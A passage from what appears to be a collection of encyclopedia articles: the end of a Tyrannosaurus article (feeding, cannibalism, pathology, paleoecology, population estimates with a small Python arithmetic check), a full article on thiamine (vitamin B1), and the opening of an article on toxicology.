aggressor. Since the Triceratops wounds healed, it is most likely that the Triceratops survived the encounter, perhaps by fending off the Tyrannosaurus with its horns. Studies of Sue found a broken and healed fibula and tail vertebrae, scarred facial bones, and a tooth from another Tyrannosaurus embedded in a neck vertebra, providing evidence of aggressive behavior. Studies on hadrosaur vertebrae from the Hell Creek Formation that were punctured by the teeth of what appears to be a late-stage juvenile Tyrannosaurus indicate that, despite lacking the bone-crushing adaptations of adults, young individuals were still capable of using the same bone-puncturing feeding technique as their adult counterparts. Tyrannosaurus may have had infectious saliva used to kill its prey, as proposed by William Abler in 1992. Abler observed that the serrations (tiny protuberances) on the cutting edges of the teeth are closely spaced, enclosing little chambers.
These chambers might have trapped pieces of carcass with bacteria, giving Tyrannosaurus a deadly, infectious bite, much as the Komodo dragon was once thought to have. Jack Horner and Don Lessem, in a 1993 popular book, questioned Abler's hypothesis, arguing that Tyrannosaurus's tooth serrations are more like cubes in shape, whereas the serrations on a Komodo monitor's teeth are rounded. Tyrannosaurus, like most other theropods, probably primarily processed carcasses with lateral shakes of the head, as crocodilians do. The head was not as maneuverable as the skulls of allosauroids, due to the flat joints of the neck vertebrae.

Cannibalism

Evidence also strongly suggests that tyrannosaurs were at least occasionally cannibalistic. For Tyrannosaurus itself, there is strong evidence of cannibalism in at least a scavenging capacity, based on tooth marks on the foot bones, humerus, and metatarsals of one specimen. Fossils from the Fruitland Formation, the Kirtland Formation (both Campanian in age), and the Maastrichtian-aged Ojo Alamo Formation suggest that cannibalism was present in various tyrannosaurid genera of the San Juan Basin. The evidence gathered from the specimens suggests opportunistic feeding behavior in tyrannosaurids that cannibalized members of their own species. A study by Currie, Horner, Erickson, and Longrich in 2010 has been put forward as evidence of cannibalism in the genus Tyrannosaurus. They studied some Tyrannosaurus specimens with tooth marks in the bones, attributable to the same genus. The tooth marks were identified in the humerus, foot bones, and metatarsals, and this was seen as evidence of opportunistic scavenging, rather than wounds caused by intraspecific combat. In a fight, they proposed, it would be difficult to reach down to bite the feet of a rival, making it more likely that the bite marks were made in a carcass. As the bite marks were made in body parts with relatively scant amounts of flesh, it is suggested that the Tyrannosaurus was feeding on a cadaver whose fleshier parts had already been consumed. They were also open to the possibility that other tyrannosaurids practiced cannibalism.

Parenting

While there is no direct evidence of Tyrannosaurus raising its young (the rarity of juvenile and nest tyrannosaur fossils has left researchers guessing), some have suggested that, like its closest living relatives, the modern archosaurs (birds and crocodiles), Tyrannosaurus may have protected and fed its young. Crocodilians and birds are often suggested by some paleontologists to be modern analogues for dinosaur parenting. Direct evidence of parental behavior exists in other dinosaurs, such as Maiasaura peeblesorum, the first dinosaur discovered to have raised its young, as well as in the more closely related oviraptorids, the latter suggesting parental behavior in theropods.

Pathology

In 2001, Bruce Rothschild and others published a study examining evidence for stress fractures and tendon avulsions in theropod dinosaurs and the implications for their behavior. Since stress fractures are caused by repeated trauma rather than singular events, they are more likely to be caused by regular behavior than other types of injuries. Of the 81 Tyrannosaurus foot bones examined in the study, one was found to have a stress fracture, while none of the 10 hand bones were found to have stress fractures. The researchers found tendon avulsions only in Tyrannosaurus and Allosaurus. An avulsion injury left a divot on the humerus of Sue the T.
rex, apparently located at the origin of the deltoid or teres major muscles. The presence of avulsion injuries limited to the forelimb and shoulder in both Tyrannosaurus and Allosaurus suggests that theropods may have had a musculature more complex than, and functionally different from, that of birds. The researchers concluded that Sue's tendon avulsion was probably obtained from struggling prey. The presence of stress fractures and tendon avulsions in general provides evidence for a "very active" predation-based diet rather than obligate scavenging. A 2009 study showed that smooth-edged holes in the skulls of several specimens might have been caused by Trichomonas-like parasites that commonly infect birds. According to the study, seriously infected individuals, including "Sue" and MOR 980 ("Peck's Rex"), might therefore have died from starvation after feeding became increasingly difficult. Previously, these holes had been explained by the bacterial bone infection actinomycosis or by intraspecific attacks. A subsequent study found that, while trichomoniasis has many attributes of the proposed model (it is osteolytic and intra-oral), several features make the claim that it was the cause of death less well supported by the evidence. For example, the sharp margins with little reactive bone shown by radiographs of Trichomonas-infected birds are dissimilar to the reactive bone seen in the affected T. rex specimens. Also, trichomoniasis can be very rapidly fatal in birds (14 days or less), albeit in its milder form, which suggests that if a Trichomonas-like protozoan was the culprit, trichomoniasis was less acute in its non-avian dinosaur form during the Late Cretaceous. Finally, lesions of this type are relatively much larger in small bird throats, and may not have been large enough to choke a T. rex. A more recent study examining the pathologies concluded that the osseous alteration observed most closely resembles that seen around healing human cranial trepanations and healing fractures in the Triassic reptile Stagonolepis, in the absence of infection. The possible cause may instead have been intraspecific combat. One study of Tyrannosaurus specimens with tooth marks in the bones attributable to the same genus was presented as evidence of cannibalism. Tooth marks in the humerus, foot bones, and metatarsals may indicate opportunistic scavenging, rather than wounds caused by combat with another T. rex. Other tyrannosaurids may also have practiced cannibalism.

Paleoecology

Tyrannosaurus lived during what is referred to as the Lancian faunal stage (Maastrichtian age) at the end of the Late Cretaceous. Tyrannosaurus ranged from Canada in the north to at least New Mexico in the south of Laramidia. During this time, Triceratops was the major herbivore in the northern portion of its range, while the titanosaurian sauropod Alamosaurus "dominated" its southern range. Tyrannosaurus remains have been discovered in a variety of ecosystems, including inland and coastal subtropical environments and semi-arid plains. Several notable Tyrannosaurus remains have been found in the Hell Creek Formation. During the Maastrichtian, this area was subtropical, with a warm and humid climate. The flora consisted mostly of angiosperms, but also included trees like dawn redwood (Metasequoia) and Araucaria.
Tyrannosaurus shared this ecosystem with the ceratopsians Leptoceratops, Torosaurus, and Triceratops, the hadrosaurid Edmontosaurus annectens, the parksosaurid Thescelosaurus, the ankylosaurs Ankylosaurus and Denversaurus, the pachycephalosaurs Pachycephalosaurus and Sphaerotholus, and the theropods Ornithomimus, Struthiomimus, Acheroraptor, Dakotaraptor, Pectinodon and Anzu. Another formation with Tyrannosaurus remains is the Lance Formation of Wyoming. This has been interpreted as a bayou environment similar to today's Gulf Coast. The fauna was very similar to Hell Creek, but with Struthiomimus replacing its relative Ornithomimus. The small ceratopsian Leptoceratops also lived in the area. In its southern range, specifically based on remains discovered from the North Horn Formation of Utah, Tyrannosaurus rex lived alongside the titanosaur Alamosaurus, the ceratopsid Torosaurus, and indeterminate troodontids and hadrosaurids. Tyrannosaurus mcraeensis from the McRae Group of New Mexico coexisted with the ceratopsid Sierraceratops and possibly the titanosaur Alamosaurus. Potential remains identified as cf. Tyrannosaurus have also been discovered from the Javelina Formation of Texas, where the remains of the titanosaur Alamosaurus, the ceratopsid Bravoceratops, the pterosaurs Quetzalcoatlus and Wellnhopterus, and possible species of troodontids and hadrosaurids are found. Its southern range is thought to have been dominated by semi-arid inland plains, following the probable retreat of the Western Interior Seaway as global sea levels fell. Tyrannosaurus may have also inhabited Mexico's Lomas Coloradas Formation in Sonora. Though skeletal evidence is lacking, six shed and broken teeth from the fossil bed have been thoroughly compared with other theropod genera and appear to be identical to those of Tyrannosaurus. If true, the evidence indicates the range of Tyrannosaurus was possibly more extensive than previously believed. It is possible that tyrannosaurs were originally Asian species, migrating to North America before the end of the Cretaceous period. Population estimates According to studies published in 2021 by Charles Marshall et al., the total population of adult Tyrannosaurus at any given time was perhaps 20,000 individuals, with computer estimations also suggesting a total population no lower than 1,300 and no higher than 328,000. The authors themselves suggest that the estimate of 20,000 individuals is probably lower than what should be expected, especially when factoring in that disease pandemics could easily wipe out such a small population. Over the span of the genus' existence, it is estimated that there were about 127,000 generations, adding up to a total of roughly 2.5 billion animals until their extinction. In the same paper, it is suggested that in a population of Tyrannosaurus adults numbering 20,000, the number of individuals living in an area the size of California could be as high as 3,800 animals, while an area the size of Washington, D.C. could support a population of only two adult Tyrannosaurus. The study does not include juveniles in this population estimate because they occupied a different niche than the adults; the total population was therefore likely much higher once juveniles are accounted for.
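The headline arithmetic quoted above is easy to verify. The following Python snippet is an illustrative back-of-envelope recomputation using the paper's point estimates as inputs; the variable names are ours, and nothing here goes beyond the figures already cited.

```python
# Back-of-envelope check of the Marshall et al. (2021) figures quoted above.
# Inputs are the paper's point estimates; this is illustration, not re-analysis.
standing_adults = 20_000     # adult Tyrannosaurus alive at any one time
generations = 127_000        # estimated generations over the genus' span

total_adults = standing_adults * generations
print(f"Adults over the genus' existence: ~{total_adults / 1e9:.2f} billion")
# -> ~2.54 billion, matching the "roughly 2.5 billion" cited above

# At the quoted fossilization odds of one in 80 million, the expected number
# of preserved individuals is small:
print(f"Expected fossilized individuals: ~{total_adults / 80e6:.0f}")
# -> ~32
```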
Simultaneously, studies of living carnivores suggest that some predator populations are higher in density than others of similar weight (such as jaguars and hyenas, which are similar in weight but have vastly differing population densities). Lastly, the study suggests that in most cases, only one in 80 million Tyrannosaurus would become fossilized, while the chances were likely as high as one in every 16,000 of an individual becoming fossilized in areas with denser populations. Meiri (2022) questioned the reliability of the estimates, citing uncertainty in metabolic rate, body size, sex- and age-specific survival rates, habitat requirements and range size variability as shortcomings Marshall et al. did not take into account. The authors of the original publication replied that while they agree that their reported uncertainties were probably too small, their framework is flexible enough to accommodate uncertainty in physiology, and that their calculations do not depend on short-term changes in population density and geographic range, but rather on their long-term averages. Finally, they remark that they did estimate the range of reasonable survivorship curves and that they did include uncertainty in the time of onset of sexual maturity and in the growth curve by incorporating the uncertainty in the maximum body mass. Cultural significance Since it was first described in 1905, T. rex has become the most widely recognized dinosaur species in popular culture. It is the only dinosaur that is commonly known to the general public by its full scientific name (binomial name), and the scientific abbreviation T. rex has also come into wide usage. Robert T. Bakker notes this in The Dinosaur Heresies and explains that "a name like T. rex is just irresistible to the tongue."
Biology and health sciences
Dinosaurs and prehistoric reptiles
null
30500
https://en.wikipedia.org/wiki/Thiamine
Thiamine
Thiamine, also known as thiamin and vitamin B1, is a vitamin – an essential micronutrient for humans and animals. It is found in food and commercially synthesized to be a dietary supplement or medication. Phosphorylated forms of thiamine are required for some metabolic reactions, including the breakdown of glucose and amino acids. Food sources of thiamine include whole grains, legumes, and some meats and fish. Grain processing removes much of the vitamin content, so in many countries cereals and flours are enriched with thiamine. Supplements and medications are available to treat and prevent thiamine deficiency and the disorders that result from it, such as beriberi and Wernicke encephalopathy. They are also used to treat maple syrup urine disease and Leigh syndrome. Supplements and medications are typically taken by mouth, but may also be given by intravenous or intramuscular injection. Thiamine supplements are generally well tolerated. Allergic reactions, including anaphylaxis, may occur when repeated doses are given by injection. Thiamine is on the World Health Organization's List of Essential Medicines. It is available as a generic medication, and in some countries as a non-prescription dietary supplement. In 2022, it was the 288th most commonly prescribed medication in the United States, with more than 500,000 prescriptions. Definition Thiamine is one of the B vitamins and is also known as vitamin B1. It is a cation that is usually supplied as a chloride salt. It is soluble in water, methanol and glycerol, but practically insoluble in less polar organic solvents. In the body, thiamine can form derivatives, the best-characterized of which is thiamine pyrophosphate (TPP), a coenzyme in the catabolism of sugars and amino acids. The chemical structure consists of an aminopyrimidine and a thiazolium ring linked by a methylene bridge. The thiazole is substituted with methyl and hydroxyethyl side chains. Thiamine is stable at acidic pH, but it is unstable in alkaline solutions and when exposed to heat. It reacts strongly in Maillard-type reactions. Oxidation yields the fluorescent derivative thiochrome, which can be used to determine the amount of the vitamin present in biological samples. Deficiency Well-known disorders caused by thiamine deficiency include beriberi, Wernicke–Korsakoff syndrome, optic neuropathy, Leigh's disease, African seasonal ataxia (or Nigerian seasonal ataxia), and central pontine myelinolysis. Symptoms include malaise, weight loss, irritability and confusion. In Western countries, chronic alcoholism is a risk factor for deficiency. Also at risk are older adults, persons with HIV/AIDS or diabetes, and those who have had bariatric surgery. Varying degrees of thiamine insufficiency have been associated with the long-term use of diuretics. Biological functions Five natural thiamine phosphate derivatives are known: thiamine monophosphate (ThMP), thiamine pyrophosphate (TPP), thiamine triphosphate (ThTP), adenosine thiamine diphosphate (AThDP) and adenosine thiamine triphosphate (AThTP). They are involved in many cellular processes. The best-characterized form is TPP, a coenzyme in the catabolism of sugars and amino acids. While its role is well-known, the non-coenzyme action of thiamine and derivatives may be realized through binding to proteins which do not use that mechanism. No physiological role is known for the monophosphate except as an intermediate in cellular conversion of thiamine to the di- and triphosphates.
Thiamine pyrophosphate Thiamine pyrophosphate (TPP), also called thiamine diphosphate (ThDP), participates as a coenzyme in metabolic reactions, including those in which polarity inversion takes place. Its synthesis is catalyzed by the enzyme thiamine diphosphokinase according to the reaction thiamine + ATP → TPP + AMP (EC 2.7.6.2). However, recent findings reveal that uridine 5′-triphosphate (UTP), rather than ATP, is the preferred substrate for TPP synthesis in cells, with TPK1 showing a ~10-fold higher affinity for UTP. TPP is a coenzyme for several enzymes that catalyze the transfer of two-carbon units and in particular the dehydrogenation (decarboxylation and subsequent conjugation with coenzyme A) of 2-oxoacids (alpha-keto acids). The mechanism of action of TPP as a coenzyme relies on its ability to form an ylide. Examples present in most species include pyruvate dehydrogenase, 2-oxoglutarate dehydrogenase (also called α-ketoglutarate dehydrogenase), branched-chain α-keto acid dehydrogenase, 2-hydroxyphytanoyl-CoA lyase, and transketolase; examples present in some species include pyruvate decarboxylase (in yeast) and several additional bacterial enzymes. The enzymes transketolase, pyruvate dehydrogenase (PDH), and 2-oxoglutarate dehydrogenase (OGDH) are important in carbohydrate metabolism. PDH links glycolysis to the citric acid cycle. OGDH catalyzes the overall conversion of 2-oxoglutarate (alpha-ketoglutarate) to succinyl-CoA and CO2 during the citric acid cycle. The reaction catalyzed by OGDH is a rate-limiting step in the citric acid cycle. The cytosolic enzyme transketolase is central to the pentose phosphate pathway, a major route for the biosynthesis of the pentose sugars deoxyribose and ribose. The mitochondrial PDH and OGDH are part of biochemical pathways that result in the generation of adenosine triphosphate (ATP), which is the main energy transfer molecule for the cell. In the nervous system, PDH is also involved in the synthesis of myelin and the neurotransmitter acetylcholine. Thiamine triphosphate ThTP is implicated in chloride channel activation in the neurons of mammals and other animals, although its role is not well understood. ThTP has been found in bacteria, fungi and plants, suggesting that it has other cellular roles. In Escherichia coli, it is implicated in the response to amino acid starvation. Adenosine derivatives AThDP exists in small amounts in vertebrate liver, but its role remains unknown. AThTP is present in E. coli, where it accumulates as a result of carbon starvation. In this bacterium, AThTP may account for a considerable fraction of total thiamine. It also exists in lesser amounts in yeast, roots of higher plants and animal tissue. Medical uses During pregnancy, thiamine is sent to the fetus via the placenta. Pregnant women have a greater requirement for the vitamin than other adults, especially during the third trimester. Pregnant women with hyperemesis gravidarum are at an increased risk of thiamine deficiency due to losses when vomiting. In lactating women, thiamine is delivered in breast milk even if it results in thiamine deficiency in the mother. Thiamine is important not only for mitochondrial membrane development, but also for synaptic membrane function. It has also been suggested that a deficiency hinders brain development in infants and may be a cause of sudden infant death syndrome. Dietary recommendations The US National Academy of Medicine updated the Estimated Average Requirements (EARs) and Recommended Dietary Allowances (RDAs) for thiamine in 1998.
The EARs for thiamine for women and men aged 14 and over are 0.9 mg/day and 1.1 mg/day, respectively; the RDAs are 1.1 and 1.2 mg/day, respectively. RDAs are higher than EARs to provide adequate intake levels for individuals with higher than average requirements. The RDA during pregnancy and for lactating females is 1.4 mg/day. For infants up to the age of 12 months, the Adequate Intake (AI) is 0.2–0.3 mg/day and for children aged 1–13 years the RDA increases with age from 0.5 to 0.9 mg/day. The European Food Safety Authority (EFSA) refers to the collective set of information as Dietary Reference Values, with Population Reference Intakes (PRIs) instead of RDAs, and Average Requirements instead of EARs. For women (including those pregnant or lactating), men and children, the PRI is 0.1 mg thiamine per megajoule (MJ) of energy in their diet. As the conversion is 1 MJ = 239 kcal, an adult consuming 2390 kilocalories ought to be consuming 1.0 mg thiamine. This is slightly lower than the US RDA. Neither the National Academy of Medicine nor EFSA has set an upper intake level for thiamine, as there is no human data for adverse effects from high doses. Safety Thiamine is generally well tolerated and non-toxic when administered orally. There are rare reports of adverse side effects when thiamine is given intravenously, including allergic reactions, nausea, lethargy, and impaired coordination. Labeling For US food and dietary supplement labeling purposes, the amount in a serving is expressed as a percent of Daily Value. Since 27 May 2016, the Daily Value has been 1.2 mg, in line with the RDA. Sources Thiamine is found in a wide variety of processed and whole foods, including lentils, peas, whole grains, pork, and nuts. A typical daily prenatal vitamin product contains around 1.5 mg of thiamine. Food fortification Some countries require or recommend fortification of grain foods such as wheat, rice or maize (corn) because processing lowers vitamin content. As of February 2022, 59 countries, mostly in North and Sub-Saharan Africa, require food fortification of wheat, rice or maize with thiamine or thiamine mononitrate. The amounts stipulated range from 2.0 to 10.0 mg/kg. An additional 18 countries have a voluntary fortification program. For example, the Indian government recommends 3.5 mg/kg for "maida" (white) and "atta" (whole wheat) flour. Synthesis Biosynthesis Thiamine biosynthesis occurs in bacteria, some protozoans, plants, and fungi. The thiazole and pyrimidine moieties are biosynthesized separately and are then combined to form ThMP by the action of thiamine-phosphate synthase. The pyrimidine ring system is formed in a reaction catalysed by phosphomethylpyrimidine synthase (ThiC), an enzyme in the radical SAM superfamily of iron–sulfur proteins, which use S-adenosyl methionine as a cofactor. The starting material is 5-aminoimidazole ribotide, which undergoes a rearrangement reaction via radical intermediates that are incorporated into the product. The thiazole ring is formed in a reaction catalysed by thiazole synthase (EC 2.8.1.10). The ultimate precursors are 1-deoxy-D-xylulose 5-phosphate, 2-iminoacetate and a sulfur carrier protein called ThiS. An additional protein, ThiG, is also required to bring together all the components of the ring at the enzyme active site.
The final step to form ThMP involves decarboxylation of the thiazole intermediate, which reacts with the pyrophosphate derivative of phosphomethylpyrimidine, itself a product of a kinase, phosphomethylpyrimidine kinase. The biosynthetic pathways differ among organisms. In E. coli and other Enterobacteriaceae, ThMP is phosphorylated to the cofactor TPP by a thiamine-phosphate kinase (ThMP + ATP → TPP + ADP). In most bacteria and in eukaryotes, ThMP is hydrolyzed to thiamine and then pyrophosphorylated to TPP by thiamine diphosphokinase (thiamine + ATP → TPP + AMP). The biosynthetic pathways are regulated by riboswitches. If there is sufficient thiamine present in the cell, then the thiamine binds to the mRNAs for the enzymes that are required in the pathway and prevents their translation. If there is no thiamine present, then there is no inhibition, and the enzymes required for the biosynthesis are produced. The specific riboswitch, the TPP riboswitch, is the only known riboswitch found in both eukaryotic and prokaryotic organisms. Laboratory synthesis In the first total synthesis in 1936, ethyl 3-ethoxypropanoate was treated with ethyl formate to give an intermediate dicarbonyl compound which, when reacted with acetamidine, formed a substituted pyrimidine. Conversion of its hydroxyl group to an amino group was carried out by nucleophilic aromatic substitution, first to the chloride derivative using phosphorus oxychloride, followed by treatment with ammonia. The ethoxy group was then converted to a bromo derivative using hydrobromic acid. In the final stage, thiamine (as its dibromide salt) was formed in an alkylation reaction using 4-methyl-5-(2-hydroxyethyl)thiazole. Industrial synthesis Merck & Co. adapted the 1936 laboratory-scale synthesis, allowing them to manufacture thiamine in Rahway in 1937. However, an alternative route using the intermediate Grewe diamine (5-(aminomethyl)-2-methyl-4-pyrimidinamine), first published in 1937, was investigated by Hoffmann-La Roche and competitive manufacturing processes followed. Efficient routes to the diamine have continued to be of interest. In the European Economic Area, thiamine is registered under REACH regulation and between 100 and 1,000 tonnes per annum are manufactured or imported there. Synthetic analogues Many vitamin B1 analogues, such as benfotiamine, fursultiamine, and sulbutiamine, are synthetic derivatives of thiamine. Most were developed in Japan in the 1950s and 1960s as forms that were intended to improve absorption compared to thiamine. Some are approved for use in some countries as a drug or non-prescription dietary supplement for treatment of diabetic neuropathy or other health conditions. Absorption, metabolism and excretion In the upper small intestine, thiamine phosphate esters present in food are hydrolyzed by alkaline phosphatase enzymes. At low concentrations (<2 μmol/L), the absorption process is carrier-mediated. At higher concentrations, absorption also occurs via passive diffusion. Active transport can be inhibited by alcohol consumption or by folate deficiency. The majority of thiamine in serum circulates bound to albumin, with a substantial fraction carried in erythrocytes (red blood cells), and is delivered to cells with high metabolic needs, particularly those in the brain, liver, pancreas, heart, and skeletal and smooth muscles, including cardiac muscle cells.
A specific binding protein called thiamine-binding protein has been identified in rat serum and is believed to be a hormone-regulated carrier protein important for tissue distribution of thiamine. Uptake of thiamine by cells of the blood and other tissues occurs via active transport and passive diffusion. Two members of the family of transporter proteins encoded by the genes SLC19A2 and SLC19A3 are capable of thiamine transport. In some tissues, thiamine uptake and secretion appear to be mediated by a Na+-dependent transporter and a transcellular proton gradient. Human storage of thiamine is about 25 to 50 mg, with the greatest concentrations in liver, skeletal muscle, heart, brain, and kidneys. ThMP and free (unphosphorylated) thiamine are present in plasma, milk, cerebrospinal fluid, and, it is presumed, all extracellular fluid. Unlike the highly phosphorylated forms of thiamine, ThMP and free thiamine are capable of crossing cell membranes. Calcium and magnesium have been shown to affect the distribution of thiamine in the body, and magnesium deficiency has been shown to aggravate thiamine deficiency. Thiamine content in human tissues is lower than that in other species. The half-life of thiamine stored in body tissues is about 9–18 days, while after intake of high doses, the half-life of thiamine in circulating blood is about 1 to 12 hours. Additionally, thiamine pyrophosphate derived from pyrimidines supports lipid synthesis and adipogenesis, highlighting its role in energy storage and cellular differentiation. Thiamine and its metabolites (2-methyl-4-amino-5-pyrimidine carboxylic acid, 4-methyl-thiazole-5-acetic acid, and others) are excreted principally in the urine. Interference The bioavailability of thiamine in foods can be interfered with in a variety of ways. Sulfites, added to foods as a preservative, will attack thiamine at the methylene bridge, cleaving the pyrimidine ring from the thiazole ring. The rate of this reaction is increased under acidic conditions. Thiamine is degraded by thermolabile thiaminases present in some species of fish, shellfish and other foods. The pupae of an African silkworm, Anaphe venata, are a traditional food in Nigeria. Consumption leads to thiamine deficiency. Older literature reported that in Thailand, consumption of fermented, uncooked fish caused thiamine deficiency, but either abstaining from eating the fish or heating it first reversed the deficiency. In ruminants, intestinal bacteria synthesize thiamine and thiaminases. The bacterial thiaminases are cell surface enzymes that must dissociate from the cell membrane before being activated; the dissociation can occur in ruminants under acidotic conditions. In dairy cows, over-feeding with grain causes subacute ruminal acidosis and increased ruminal bacterial thiaminase release, resulting in thiamine deficiency. Two small studies conducted in Thailand reported that chewing slices of areca nut wrapped in betel leaves, or chewing tea leaves, reduced food thiamine bioavailability by a mechanism that may involve tannins. Bariatric surgery for weight loss is known to interfere with vitamin absorption. A meta-analysis reported that a substantial proportion of people who undergo bariatric surgery experience vitamin B1 deficiency. History Thiamine was the first of the water-soluble vitamins to be isolated.
The earliest observations in humans and in chickens had shown that diets of primarily polished white rice caused beriberi, but did not attribute it to the absence of a previously unknown essential nutrient. In 1884, Takaki Kanehiro, a surgeon general in the Imperial Japanese Navy, rejected the previous germ theory for beriberi and suggested instead that the disease was due to insufficiencies in the diet. Switching diets on a navy ship, he discovered that replacing a diet of white rice only with one also containing barley, meat, milk, bread, and vegetables nearly eliminated beriberi on a nine-month sea voyage. However, Takaki had added many foods to the successful diet and he incorrectly attributed the benefit to increased protein intake, as vitamins were unknown at the time. The Navy was not convinced of the need for such an expensive program of dietary improvement, and many men continued to die of beriberi, even during the Russo-Japanese war of 1904–5. Not until 1905, after the anti-beriberi factor had been discovered in rice bran (removed by polishing into white rice) and in barley bran, was Takaki's experiment rewarded. He was made a baron in the Japanese peerage system, after which he was affectionately called "Barley Baron". The specific connection to grain was made in 1897 by Christiaan Eijkman, a military doctor in the Dutch East Indies, who discovered that fowl fed on a diet of cooked, polished rice developed paralysis that could be reversed by discontinuing rice polishing. He attributed beriberi to the high levels of starch in rice being toxic. He believed that the toxicity was countered by a compound present in the rice polishings. An associate, Gerrit Grijns, correctly interpreted the connection between excessive consumption of polished rice and beriberi in 1901: he concluded that rice contains an essential nutrient in the outer layers of the grain that is removed by polishing. Eijkman was eventually awarded the Nobel Prize in Physiology or Medicine in 1929, because his observations led to the discovery of vitamins. In 1910, a Japanese agricultural chemist of Tokyo Imperial University, Umetaro Suzuki, isolated a water-soluble thiamine compound from rice bran, which he named aberic acid. (He later renamed it Orizanin.) He described the compound as not only an anti-beriberi factor, but also as being essential to human nutrition; however, this finding failed to gain publicity outside of Japan, because a claim that the compound was a new finding was omitted in translation of his publication from Japanese to German. In 1911, the Polish biochemist Casimir Funk isolated the antineuritic substance from rice bran (the modern thiamine) that he called a "vitamine" (on account of its containing an amino group). However, Funk did not completely characterize its chemical structure. The Dutch chemists Barend Coenraad Petrus Jansen and his closest collaborator Willem Frederik Donath went on to isolate and crystallize the active agent in 1926; its structure was determined by Robert Runnels Williams in 1934. Thiamine was named by the Williams team as a portmanteau of "thio" (meaning sulfur-containing) and "vitamin". The term "vitamin" came indirectly, by way of Funk, from the amine group of thiamine itself (although by this time, vitamins were known to not always be amines, for example, vitamin C). Thiamine was also synthesized by the Williams group in 1936.
Sir Rudolph Peters, in Oxford, used pigeons to understand how thiamine deficiency results in the pathological-physiological symptoms of beriberi. Pigeons fed exclusively on polished rice developed opisthotonos, a condition characterized by head retraction. If not treated, the animals died after a few days. Administering thiamine once opisthotonos appeared led to a complete cure within 30 minutes. As no morphological modifications were seen in the brain of the pigeons before and after treatment with thiamine, Peters introduced the concept of a biochemically induced injury. In 1937, Lohmann and Schuster showed that the diphosphorylated thiamine derivative, TPP, was a cofactor required for the oxidative decarboxylation of pyruvate.
Biology and health sciences
Vitamins
Health
30531
https://en.wikipedia.org/wiki/Toxicology
Toxicology
Toxicology is a scientific discipline, overlapping with biology, chemistry, pharmacology, and medicine, that involves the study of the adverse effects of chemical substances on living organisms and the practice of diagnosing and treating exposures to toxins and toxicants. The relationship between dose and its effects on the exposed organism is of high significance in toxicology. Factors that influence chemical toxicity include the dosage, duration of exposure (whether it is acute or chronic), route of exposure, species, age, sex, and environment. Toxicologists are experts on poisons and poisoning. There is a movement for evidence-based toxicology as part of the larger movement towards evidence-based practices. Toxicology is currently contributing to the field of cancer research, since some toxins can be used as drugs for killing tumor cells. One prime example of this is ribosome-inactivating proteins, tested in the treatment of leukemia. The word toxicology is a neoclassical compound from Neo-Latin, formed from the combining forms toxico- + -logy, which in turn come from the Ancient Greek words τοξικός (toxikos, "poisonous") and λόγος (logos, "subject matter"). History The earliest treatise dedicated to the general study of plant and animal poisons, including their classification, recognition, and the treatment of their effects, is the Kalpasthāna, one of the major sections of the Suśrutasaṃhitā, a Sanskrit work composed before ca. 300 CE and perhaps in part as early as the fourth century BCE. The Kalpasthāna was influential on many later Sanskrit medical works and was translated into Arabic and other languages, influencing South East Asia, the Middle East, Tibet and eventually Europe. Dioscorides, a Greek physician in the court of the Roman emperor Nero, made an early attempt to classify plants according to their toxic and therapeutic effect. A work attributed to the 10th-century author Ibn Wahshiyya called the Book on Poisons describes various toxic substances and poisonous recipes that can be made using magic. A 14th-century Kannada poetic work attributed to the Jain prince Mangarasa, Khagendra Mani Darpana, describes several poisonous plants. The 16th-century Swiss physician Paracelsus is considered "the father" of modern toxicology, based on his rigorous (for the time) approach to understanding the effects of substances on the body. He is credited with the classic toxicology maxim "Alle Dinge sind Gift und nichts ist ohne Gift; allein die Dosis macht, dass ein Ding kein Gift ist", which translates as "All things are poisonous and nothing is without poison; only the dose makes a thing not poisonous." This is often condensed to "The dose makes the poison", or in Latin "Sola dosis facit venenum". Mathieu Orfila is also considered the modern father of toxicology, having given the subject its first formal treatment in 1813 in his Traité des poisons, also called Toxicologie générale. In 1850, Jean Stas became the first person to successfully isolate plant poisons from human tissue. This allowed him to identify the use of nicotine as a poison in the Bocarmé murder case, providing the evidence needed to convict the Belgian Count Hippolyte Visart de Bocarmé of killing his brother-in-law. Basic principles The goal of toxicity assessment is to identify adverse effects of a substance. Adverse effects depend on two main factors: i) routes of exposure (oral, inhalation, or dermal) and ii) dose (duration and concentration of exposure).
To explore dose, substances are tested in both acute and chronic models. Generally, different sets of experiments are conducted to determine whether a substance causes cancer and to examine other forms of toxicity. Factors that influence chemical toxicity include dosage (both large single exposures (acute) and continuous small exposures (chronic) are studied), route of exposure (ingestion, inhalation, or skin absorption), and other factors such as species, age, sex, health, environment, and individual characteristics. The discipline of evidence-based toxicology strives to transparently, consistently, and objectively assess available scientific evidence in order to answer questions in toxicology, the study of the adverse effects of chemical, physical, or biological agents on living organisms and the environment, including the prevention and amelioration of such effects. Evidence-based toxicology has the potential to address concerns in the toxicological community about the limitations of current approaches to assessing the state of the science. These include concerns related to transparency in decision-making, synthesis of different types of evidence, and the assessment of bias and credibility. Evidence-based toxicology has its roots in the larger movement towards evidence-based practices. Testing methods Toxicity experiments may be conducted in vivo (using the whole animal), in vitro (testing on isolated cells or tissues), or in silico (in a computer simulation). In vivo model organism The classic experimental tool of toxicology is testing on non-human animals. Examples of model organisms are Galleria mellonella, which can replace small mammals; zebrafish (Danio rerio), which allow for the study of toxicology in a lower-order vertebrate in vivo; and Caenorhabditis elegans. As of 2014, such animal testing provides information that is not available by other means about how substances function in a living organism. The use of non-human animals for toxicology testing is opposed by some organisations for reasons of animal welfare, and it has been restricted or banned under some circumstances in certain regions, such as the testing of cosmetics in the European Union. In vitro methods While testing in animal models remains a method of estimating human effects, there are both ethical and technical concerns with animal testing. Since the late 1950s, the field of toxicology has sought to reduce or eliminate animal testing under the rubric of the "Three Rs": reduce the number of experiments with animals to the minimum necessary; refine experiments to cause less suffering; and replace in vivo experiments with other types, or use simpler forms of life when possible. The historical development of alternative testing methods in toxicology has been published by Balls. Computer modeling is an example of an alternative, in silico toxicology testing method; using computer models of chemicals and proteins, structure-activity relationships can be determined, and chemical structures that are likely to bind to, and interfere with, proteins with essential functions can be identified. This work requires expert knowledge in molecular modeling and statistics together with expert judgment in chemistry, biology and toxicology. In 2007 the American NGO National Academy of Sciences published a report called "Toxicity Testing in the 21st Century: A Vision and a Strategy" which opened with a statement: "Change often involves a pivotal event that builds on previous history and opens the door to a new era.
